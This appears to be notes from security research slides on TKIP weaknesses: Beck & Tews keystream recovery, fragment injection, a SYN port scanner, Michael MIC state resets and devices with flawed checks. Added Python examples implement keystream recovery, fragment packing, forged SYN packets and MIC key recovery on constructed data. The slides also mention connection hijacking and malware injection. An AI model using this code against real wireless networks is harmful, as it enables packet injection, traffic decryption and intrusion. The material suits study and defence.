The Beck & Tews attack can forge 3 packets. Injecting more requires new keystreams:

    Ciphertext XOR Plaintext = Keystream

All packets start with an LLC header, which we predict with very high accuracy. Capture packets with new #IDs (the per-packet IV/TSC) and XOR each ciphertext with the predicted header to obtain a fresh keystream for that #ID.

The LLC header is only 12 bytes ... so combine the keystreams using fragmentation!

    #ID1 Data1 | #ID2 Data2 | ... | #ID16 Data16 MIC     (each fragment encrypted under its own #ID keystream)
    Data1 Data2 ... Data16 MIC                            (the reassembled MSDU with its MIC)

12 bytes of keystream per fragment: inject 120 bytes of data. (Each fragment spends 4 of its 12 bytes on the ICV, leaving 8 bytes of payload; 16 fragments give 128 bytes, minus the 8-byte MIC carried in the last fragment.)
Port scanner:
1. Get the MIC key using the Beck & Tews attack
2. Inject TCP SYN packets (forged with the recovered keystreams and MIC key)
3. Detect SYN/ACK replies based on their length

Remarks: a high amount of packet injection is proven! Also possible: DNS poisoning, DHCP spoofing, ...
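Added example (written for this page; not code from the slides or the authors' tool): the keystream recovery, fragment packing and SYN probe of the keystream, fragmentation and port-scanner slides above, in Python. It assumes the 12 predictable bytes are the 8-byte LLC/SNAP header plus the first four IPv4 header bytes, takes the Michael MIC as an input (a placeholder value is used in the demo), and constructs its own keystreams and "captured" frame so it runs offline; all function and variable names are the example's own.

```python
"""Keystream recovery from a predictable header and TKIP fragment packing (example)."""
import socket
import struct
import zlib

ICV_LEN = 4           # each fragment ends in a CRC-32 ICV covered by its keystream
MIC_LEN = 8           # one Michael MIC for the whole MSDU, carried in the last fragment
MAX_FRAGMENTS = 16    # 802.11 allows at most 16 fragments per MSDU
PREDICTED_LEN = 12    # plaintext bytes the slides treat as predictable

# LLC/SNAP header in front of every IPv4 payload carried in an 802.11 data frame.
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")


def predict_prefix(enc_body_len):
    """Predicted first 12 plaintext bytes of a captured, unfragmented IPv4 frame.

    Assumption of this example: LLC/SNAP (8 bytes) plus the first four IPv4 header
    bytes (0x45, DSCP 0x00, total length). The encrypted body is MSDU || MIC || ICV,
    so the IP total length follows from the body length.
    """
    ip_total_len = enc_body_len - len(LLC_SNAP_IP) - MIC_LEN - ICV_LEN
    return LLC_SNAP_IP + struct.pack("!BBH", 0x45, 0x00, ip_total_len)


def keystream_from_capture(enc_body):
    """Ciphertext XOR predicted plaintext = keystream for that frame's #ID."""
    prefix = predict_prefix(len(enc_body))
    return bytes(c ^ p for c, p in zip(enc_body[:PREDICTED_LEN], prefix))


def inject_capacity(keystream_len, n_fragments=MAX_FRAGMENTS):
    """MSDU bytes that fit: every fragment spends ICV_LEN keystream bytes on its
    ICV, and the final fragment also carries the MIC."""
    return n_fragments * (keystream_len - ICV_LEN) - MIC_LEN


def build_fragments(msdu, mic, keystreams):
    """Split MSDU || MIC over fragments, each encrypted under its own keystream."""
    body = msdu + mic
    per_frag = len(keystreams[0]) - ICV_LEN
    if len(body) > per_frag * len(keystreams):
        raise ValueError("not enough keystream for this MSDU")
    frags = []
    for i in range(0, len(body), per_frag):
        chunk = body[i:i + per_frag]
        plain = chunk + struct.pack("<I", zlib.crc32(chunk))   # data || ICV
        ks = keystreams[len(frags)]
        frags.append(bytes(p ^ k for p, k in zip(plain, ks)))
    return frags


def reassemble(frags, keystreams):
    """Receiver side: decrypt, check each ICV, return (msdu, mic)."""
    body = b""
    for frag, ks in zip(frags, keystreams):
        plain = bytes(c ^ k for c, k in zip(frag, ks))
        chunk, icv = plain[:-ICV_LEN], plain[-ICV_LEN:]
        if struct.unpack("<I", icv)[0] != zlib.crc32(chunk):
            raise ValueError("bad ICV")
        body += chunk
    return body[:-MIC_LEN], body[-MIC_LEN:]


def checksum(data):
    """RFC 1071 one's-complement checksum used by the IPv4 and TCP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_tcp_syn(src_ip, dst_ip, sport, dport, seq=0):
    """LLC/SNAP || IPv4 || TCP SYN: the 48-byte probe the port scanner injects."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 8192, 0, 0)
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return LLC_SNAP_IP + ip + tcp


def sample_keystreams():
    """Constructed stand-in for 16 keystreams recovered from 16 captured #IDs."""
    return [bytes((i * 37 + j * 11) & 0xFF for j in range(PREDICTED_LEN))
            for i in range(MAX_FRAGMENTS)]


def sample_capture(msdu, mic):
    """Constructed 'captured' frame body: msdu || mic || ICV under a fixed keystream.
    Returns (encrypted_body, keystream) so the recovery can be checked."""
    plain = msdu + mic
    plain += struct.pack("<I", zlib.crc32(plain))
    ks = bytes((i * 7 + 3) & 0xFF for i in range(len(plain)))
    return bytes(p ^ k for p, k in zip(plain, ks)), ks


if __name__ == "__main__":
    syn = build_tcp_syn("192.0.2.10", "192.0.2.1", 40000, 80)   # RFC 5737 test addresses
    mic = bytes.fromhex("0011223344556677")   # placeholder for the Michael MIC over syn
    body, ks = sample_capture(syn, mic)
    assert keystream_from_capture(body) == ks[:PREDICTED_LEN]
    frags = build_fragments(syn, mic, sample_keystreams())
    print(inject_capacity(PREDICTED_LEN), "bytes fit;", len(frags), "fragments used")
```

The 48-byte SYN plus its 8-byte MIC needs 7 of the 16 fragments, so one round of keystream recovery leaves room for two more probes; `reassemble` is the receiver-side check that every ICV must pass before the MIC is even looked at.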
Michael state while the receiver checks a forged packet built as Prefix | Magic | Data and MIC of a sniffed packet:

    Prefix | Magic | Sniffed packet: Data | MIC
    State1   State2   State3           State4

State1: initial state of every packet (the MIC key)
State2: state after processing the prefix
State3: equal to State1 due to the magic bytes (they reset Michael's internal state)
State4: equal to the MIC of the sniffed packet! (so the sniffed packet's own MIC is valid for the forged packet)
Possible applications? Decrypt web responses: web mail, bank details, ... Decrypt the TCP sequence number, hijack the connection and inject malware?
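Added example (not from the slides or the authors' code): Michael's block function, its inverse and the state walk of the State1..State4 slide, in Python. It shows the two facts those slides rely on: every intermediate state is recoverable, so a known plaintext and its MIC yield the MIC key (the last step of the Beck & Tews attack from the port-scanner slide), and the MIC is simply the state after the last word, so anything that returns the state to State1 leaves the MIC over the remaining data unchanged. The magic-byte sequence itself is not constructed here, since the slides do not give it. The caller supplies the Michael input as TKIP forms it (DA || SA || priority || 3 zero bytes || MSDU); the key and message in the demo are constructed.

```python
"""Michael MIC: forward, inverse, and the state walk (example)."""
import struct

MASK = 0xFFFFFFFF


def rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK


def xswap(x):
    """Swap the two bytes of each 16-bit half."""
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def block(l, r):
    """Michael block function b(L, R): four xor/add rounds."""
    r ^= rotl(l, 17)
    l = (l + r) & MASK
    r ^= xswap(l)
    l = (l + r) & MASK
    r ^= rotl(l, 3)
    l = (l + r) & MASK
    r ^= rotr(l, 2)
    l = (l + r) & MASK
    return l, r


def block_inv(l, r):
    """Exact inverse of block(): undo the rounds in reverse order."""
    l = (l - r) & MASK
    r ^= rotr(l, 2)
    l = (l - r) & MASK
    r ^= rotl(l, 3)
    l = (l - r) & MASK
    r ^= xswap(l)
    l = (l - r) & MASK
    r ^= rotl(l, 17)
    return l, r


def pad(msg):
    """Michael padding: one 0x5a byte, then 4 to 7 zero bytes to a 32-bit boundary."""
    return msg + b"\x5a" + b"\x00" * (4 + (-(len(msg) + 1)) % 4)


def words(data):
    """Little-endian 32-bit words of data (length must be a multiple of 4)."""
    return struct.unpack("<%dI" % (len(data) // 4), data)


def michael_states(key, msg):
    """All states Michael passes through: states[0] is State1 (the key words),
    each next entry is the state after one 32-bit word, states[-1] is the MIC."""
    l, r = struct.unpack("<II", key)
    states = [(l, r)]
    for w in words(pad(msg)):
        l, r = block(l ^ w, r)
        states.append((l, r))
    return states


def michael(key, msg):
    """8-byte Michael MIC of msg under the 8-byte key."""
    return struct.pack("<II", *michael_states(key, msg)[-1])


def state_after(key, prefix):
    """State2 of the slide: Michael's state after absorbing a prefix, before any
    padding. The prefix must consist of whole 32-bit words."""
    if len(prefix) % 4:
        raise ValueError("prefix must be a multiple of 4 bytes")
    l, r = struct.unpack("<II", key)
    for w in words(prefix):
        l, r = block(l ^ w, r)
    return l, r


def recover_key(msg, mic):
    """Beck & Tews key recovery: walk Michael backwards from a known (msg, MIC)
    pair to State1, which is the MIC key."""
    l, r = struct.unpack("<II", mic)
    for w in reversed(words(pad(msg))):
        l, r = block_inv(l, r)
        l ^= w
    return struct.pack("<II", l, r)


if __name__ == "__main__":
    # Standard test vector: all-zero key and empty message give 82925c1ca1d130b8.
    print(michael(bytes(8), b"").hex())
    # Constructed key and message; TKIP would prepend DA || SA || priority || 3 zero bytes.
    key, msg = bytes.fromhex("0123456789abcdef"), b"constructed MSDU"
    assert recover_key(msg, michael(key, msg)) == key
```

`recover_key` is why the Beck & Tews attack ends with the MIC key in hand: once chopchop has exposed one plaintext and its MIC, no search is needed, the states are just read off backwards. `state_after` exposes State2; a prefix followed by bytes that bring that state back to the key words is exactly what the slide calls magic bytes.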
Integrity (MIC) not verified when fragmented: Alfa AWUS036h, Belkin F5D7053, Ralink U150BB.
Attack time reduced from >8 min to zero (no MIC key has to be recovered before injecting fragmented packets).

No replay protection: Alfa AWUS036h, Belkin F5D7053, Tomato 1.28 (AP firmware).
No need to generate new keystreams: captured packets can simply be replayed.

Always accepts unencrypted packets: Alfa AWUS036h, Belkin F7D1102, Scarlet VDSL (AP of ISP in BE).
Game over, you lose!